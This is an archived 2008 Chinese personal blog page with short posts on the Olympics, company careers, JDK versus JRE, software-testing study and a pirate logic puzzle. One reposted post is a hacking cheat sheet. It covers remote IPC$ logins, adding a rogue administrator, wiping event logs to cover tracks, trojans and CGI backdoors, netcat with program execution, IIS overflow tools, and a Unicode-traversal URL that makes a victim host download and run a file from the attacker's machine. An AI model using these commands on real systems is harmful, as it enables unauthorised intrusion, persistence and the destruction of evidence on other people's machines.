日历
| |||||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 | |||
| 1 | 2 | 3 | 4 | 5 | 6 | ||||
| 7 | 8 | 9 | 10 | 11 | 12 | 13 | |||
| 14 | 15 | 16 | 17 | 18 | 19 | 20 | |||
| 21 | 22 | 23 | 24 | 25 | 26 | 27 | |||
| 28 | 29 | 30 | |||||||
搜索标题
统计信息
- 访问量: 567
- 日志数: 8
- 文件数: 2
- 建立时间: 2008-01-20
- 更新时间: 2008-04-22
我的最新日志
-
是中国人的就顶起来^
2008-4-22
大家好,我是一名普通的北漂人.我相信现在网上最火的就是"迎奥运,反藏独".作为在中国的首都--北京.在这里有很多外国办事处,为何我们不拿出我们行动给他们看?! 从现在起.不管你是那个角落,不管你是什么职位,我们爱国的心都是赤热的.让我们在自己家中的楼层窗户上或办公大楼的窗户上.插上我们圣洁的五星国旗,让北京变成一个火红的奥运城市,让这届的奥运会在这个红火的海洋里沸腾!奥运期间,让所有来北京的外国客人,让他们知道我们的团结,我们的力量!我们就是中国人……
支持的人们顶起来!
-
大公司和小公司在某种程度上的区别
2008-3-09
大公司和小公司在某种程度上的区别
小公司就好像一个铁匠铺,只有你们伙计和老板几个人,作为伙计的你除了要打铁,还要烧火,照看生意,你能学到各种各样的知识,你能得到比较全面的锻炼,对于个人能力的发展可能更多的是横向的。而你的铁匠铺生产出来的产品,估计也不过是一些粗糙的马掌,锄头,菜刀什么的。如果有一天你觉得其实如果有一个人专门去烧火,可能会使火烧得更好,更旺。但是你的老板可能会认为,现在火能烧着,能用来烧铁就足够了。多找一个人,还要多加开销,而带来的好处虽然使火更旺了,但是对于产量,以及收益没有太大的影响。所以,对于普通员工,就应该明白,在一个小公司,你就应该尽量使自己多元化,什么都掌握,但是不必什么都精通(如果能精通当然更好)。同时,你的工作也将仅仅限制在能带来最大利益的地方,更能使客户满意,从而掏钱的地方。这是由小公司的生存需要决定的。你不得不面对这样的局面,也许今天你还是个打铁的,那么明天你可能就必须跑到集市上叫卖。所以,在小公司里对于一个普通员工的好处就是,你可以锻炼你的多种能力,你也可以相对容易的在其中的某一个岗位取得一时的成功,但是如果你想取得一直的成功,需要不断变化适应环境的变化。今天你需要打马掌,明天就需要打菜刀。今天你打了几个马掌,明天就需要挑着担子出去卖掉。这样慢慢的,随着日子越来越久,你就知道了该怎么去做,这个时候你面前是两条路,一,自己单干,脱离你的老板,二,和你的铁匠铺老板的距离更进一步,比如铁匠铺老板可以把女儿嫁给你,如果他有的话,如果你也想娶的话。相比之下,大公司就好像一个汽车厂,产品的复杂性导致了n多个部门的存在,每个部门都有各自的工作。可能你只需要做一个车灯。你不必考虑车灯能否卖的出去,或者从哪里获取材料,你所有需要做的就是在这些条件都已经充分具备的情况下,如何去做好一个车灯,让它更结实,耐用,美观,达到要求的标准。做下来,你可能会成为一个做车灯的牛人,但是除了做车灯你什么都不会。你有充分的时间去学习如何做好一个车灯,会有资料,甚至师傅去指导你。你不必操心你的上一道工序是否能给你符合要求的材料,那是他们的事情,你不必考虑你的下道工序是否知道该怎么安装或者使用你的工作成果。这就是大公司,你只需要做好你份内的事情,同样也不会随便把你从一个岗位调到另一个,除非你不称职,或者你老爸是公司老板(让你熟悉各个部门然后做接班人)。在这样一个部门呆了久了,你就了解了做个车灯所需要的所有的东西,你知道如何去做,知道多久能作出来,知道怎么去安排资源,知道怎么去带徒弟,那么你也就成了lead(当然lead的工作不仅仅限于此)。如果你在大公司是个不错的工人,到了小公司,应该不难做一个lead, -
jdk与jre的区别
2008-3-09
jdk与jre的区别(转载)对于java初学者来说,往往不懂区分jdk和jre的区别,实际上这两个东西差别很大的,有必要了解一下:
简单的说JDK是面向开发人员使用的SDK,它提供了Java的开发环境和运行环境。SDK是Software Development Kit 一般指软件开发包,可以包括函数库、编译程序等。
JDK就是Java Development Kit
JRE是Java Runtime Enviroment是指Java的运行环境,是面向Java程序的使用者,而不是开发者。如果安装了JDK,会发同你的电脑有两套JRE,一套位于 \jre 另外一套位于 C:\Program Files\Java\j2re1.4.1_01 目录下,后面这套比前面那套少了Server端的Java虚拟机,不过直接将前面那套的Server端Java虚拟机复制过来就行了。而且在安装JDK可以选择是否安装这个位于 C:\Program Files\Jav a 目录下的JRE。如果你只安装JRE,而不是JDK,那么只会在 C:\Program Files\Java 目录下安装唯一的一套JRE。
JRE的地位就象一台PC机一样,我们写好的Win32应用程序需要操作系统帮我们运行,同样的,我们编写的Java程序也必须要JRE才能运行。所以当你装完JDK后,如果分别在硬盘上的两个不同地方安装了两套JRE,那么你可以想象你的电脑有两台虚拟的Java PC机,都具有运行Java程序的功能。所以我们可以说,只要你的电脑安装了JRE,就可以正确运行Jav a应用程序。
1、为什么Sun要让JDK安装两套相同的JRE?这是因为JDK里面有很多用Java所编写的开发工具(如javac.exe、jar.exe等),而且都放置在 \lib\tools.jar 里。从下面例子可以看出,先将tools.jar改名为tools1.jar,然后运行javac.exe,显示如下结果: Exception in thread "main" java.lang.NoClassDefFoundError: com/sun/tools/javac /Main 这个意思是说,你输入javac.exe与输入 java -cp c:\jdk\lib\tools.jar com.sun.tools.javac.Main 是一样的,会得到相同的结果。从这里我们可以证明javac.exe只是一个包装器(Wrapper),而制作的目的是为了让开发者免于输入太长的指命。而且可以发现\lib目录下的程序都很小,不大于2 9K,从这里我们可以得出一个结论。就是JDK里的工具几乎是用Java所编写,所以也是Java应用程序,因此要使用JDK所附的工具来开发Java程序,也必须要自行附一套JRE才行,所以位于C:\Program Files\Java目录下的那套JRE就是用来运行一般Java程序用的。
2、如果一台电脑安装两套以上的JRE,谁来决定呢?这个重大任务就落在java.exe身上。Java.exe的工作就是找到合适的JRE来运行Java程序。 Java.exe依照底下的顺序来查找JRE:自己的目录下有没有JRE;父目录有没有JRE;查询注册表: [HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Runtime Environment] 所以java.exe的运行结果与你的电脑里面哪个JRE被执行有很大的关系。
3、介绍JVM JRE目录下的Bin目录有两个目录:server与client。这就是真正的jvm.dll所在。 jvm.dll无法单独工作,当jvm.dll启动后,会使用explicit的方法(就是使用Win32 API之中的LoadLibrary()与GetProcAddress()来载入辅助用的动态链接库),而这些辅助用的动态链接库(.dll)都必须位于jvm.dll所在目录的父目录之中。因此想使用哪个JVM,只需要设置PATH,指向JRE所在目录底下的jvm.dll。 -
大家一起来学winrunner
2008-3-04
最近在重点学习winrunner和qtp,学习中遇到了很多问题,不过还好有高手指点,都能应付!不知大家在学习中怎么样? 大家可以互相交流一下,有什么问题,提出来一起想办法!我这里有份winrunner的使用说明,只要是讲的tsl的语言,大家可以看一下,虽然现在版本比较高,但很多东西还是通用的!在我的文件里下载就可以了!
-
好累!好累!
2008-2-29
好长时间没动空间,今天没什么事情就来看看!没想打还有这么多朋友来光照我,谢谢你们~
最近一直在软件测试的学习中,总想把英语搞好,却怎么也搞不好,呵呵……脑袋太笨了。
三月底房子都要到期了,还要找房子,真是麻烦呀 !还得找工作!累呀!
现在主要学者winrunner的tsl的语言,总是在出错,调来调去,愣是找不到毛病。
希望在这方能得到朋友们的支持!
-
一道年薪超过8万美金才能解答的“趣味数学题”,你能解吗?
2008-1-22
可预测年薪超过8万美金的“趣味数学题”你能解吗?
据统计,在美国,在20分钟内能回答出这道题的人,平均年薪在8万美金以上, 题 目如下:
5个海盗抢到了100颗宝石,每一颗都一样的大小和价值连城。他们决定这么分 :
1、抽签决定自己的号码(1,2,3,4,5)
2、首先,由1号提出分配方案,然后大家5人进行表决,当且仅当超过半数的 人同意时,按照他的提案进行分配, 否则将被扔入大海喂鲨鱼。
3、如果1号死后,再由2号提出分配方案,然后大家4人进行表决,当且仅当超 过半数的人同意时,按照他的提案进行分配,否则将被扔入大海喂鲨鱼。
4、以次类推……
条件: 每个海盗都是很聪明的人,都能很理智的判断得失,从而做出选择。
问题:第一个海盗提出怎样的分配方案才能够使自己的收益最大化? -
网管和黑客都必须知道的命令
2008-1-21
网管和黑客都必须知道的命令
网管和黑客都必须知道的命令
文章出处:转载 作者:不详 发布时间:2006-01-19
常用的几条NET命令:==================================================
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
(查看远程主机时间) net time \\IP地址
(定时启动某个程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工作组列表) nbtstat -A IP地址
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
(这两条把自己增加到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开连接) net use \\IP地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \\IP地址
netsvc schedule \\IP地址 /query
netsvc \\IP地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet \\IP地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\>”)
x eXit (退出本次登录会话,此命令并不终止winshell的运行)
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
四、3389登陆器,GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s \\IP地址 -l "application" -C
elsave -s \\IP地址 -l "system" -C
elsave -s \\IP地址 -l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
八、TFTPD32.EXE
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
然后可以直接令文件运行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
一、一 Xscan命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
xscan -file <主机列表文件名> <检测项目> [其他选项]
其中<检测项目> 含义如下:
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping不通的主机
-o: 跳过没有检测到开放端口的主机
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-
软件测试英语经典大全下载
2008-1-20
由于本人现在刚在软件测试学习过程中 英语在测试中是很重要的基础知识 希望大家把基础打好
这个英语整理的不是很好可能有很多重复的地方大家可以自己在整理一下
众人拾柴火焰高 让我们一起进步!
